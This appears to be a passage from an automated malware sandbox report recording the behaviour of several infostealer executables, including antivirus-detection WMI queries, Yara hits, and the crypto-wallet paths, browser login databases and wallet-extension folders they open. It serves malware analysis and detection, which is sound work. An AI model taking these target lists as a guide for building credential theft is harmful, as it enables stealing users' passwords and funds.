                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\pack82.vbe VolumeInformation
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_002493A7 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,11_2_002493A7
                          Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeCode function: 11_2_002261F0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegEnumValueA,DeleteObject,DeleteObject,DeleteObject,LookupAccountNameA,11_2_002261F0
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                          Source: s7MG2VL.exe, 0000000C.00000003.2006495167.0000000001384000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2006592567.000000000140B000.00000004.00000020.00020000.00000000.sdmp, s7MG2VL.exe, 0000000C.00000003.2028143185.00000000013DB000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000002.2470317252.000000000105B000.00000004.00000020.00020000.00000000.sdmp, ZqkKpwG.exe, 00000011.00000003.2049616075.000000000105D000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2164345206.00000000015B2000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2214314063.00000000014ED000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000002.2233517989.0000000001509000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2165401889.00000000015B3000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2145347035.00000000015AE000.00000004.00000020.00020000.00000000.sdmp, eAzoDbY.exe, 00000019.00000003.2214314063.0000000001509000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                          Source: ZqkKpwG.exe, 00000011.00000002.2473186229.00000000010F2000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000002.2469842738.0000000000B4D000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2294291516.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2273266758.0000000000B4F000.00000004.00000020.00020000.00000000.sdmp, yo7qmvz.exe, 00000023.00000003.2268488347.0000000000B4D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \MsMpeng.exe
                          Source: C:\Users\user\AppData\Local\Temp\10171300101\s7MG2VL.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\10181980101\ZqkKpwG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\10184340101\eAzoDbY.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                          Source: Yara matchFile source: 11.2.rapes.exe.220000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.13s1HMkHKv.exe.a40000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 4.2.rapes.exe.220000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 3.2.rapes.exe.220000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000004.00000002.1266514331.0000000000221000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.2465023881.0000000000221000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000003.00000002.1263210409.0000000000221000.00000040.00000001.01000000.0000000A.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000002.1235519901.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara matchFile source: 28.2.8sb9w_003.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.svchost.exe.1dbe2750000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.2.8sb9w_003.exe.83afc8.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001C.00000002.2039011701.0000000000434000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000002.2469971107.000001DBE2788000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000002.2039794527.0000000000836000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 8sb9w_003.exe PID: 4840, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4260, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: s7MG2VL.exe PID: 8140, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: ZqkKpwG.exe PID: 6364, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: eAzoDbY.exe PID: 4224, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: yo7qmvz.exe PID: 2828, type: MEMORYSTR
                          Source: Yara matchFile source: 35.2.yo7qmvz.exe.400000.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.ZqkKpwG.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.yo7qmvz.exe.400000.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 17.2.ZqkKpwG.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000F.00000002.1977980793.00000000028A6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.2466972573.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000002.2101604103.000000000096D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000011.00000002.2464880646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                          Source: s7MG2VL.exe, 0000000C.00000003.1981626588.0000000001384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
                          Source: s7MG2VL.exe, 0000000C.00000003.1981626588.0000000001384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
                          Source: s7MG2VL.exe, 0000000C.00000003.1981626588.0000000001384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                          Source: s7MG2VL.exe, 0000000C.00000003.1981626588.0000000001384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                          Source: s7MG2VL.exe, 0000000C.00000003.1981626588.0000000001384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                          Source: s7MG2VL.exe, 0000000C.00000003.1981626588.0000000001384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                          Source: s7MG2VL.exe, 0000000C.00000003.2090607311.0000000001363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Binance
                          Source: s7MG2VL.exe, 0000000C.00000003.1981626588.0000000001384000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                          Source: s7MG2VL.exe, 0000000C.00000003.1982341555.0000000001379000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                          Source: s7MG2VL.exe, 0000000C.00000003.1982341555.000000000135D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                          Source: C:\Users\user\AppData\Local\Temp\10191230101\yo7qmvz.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
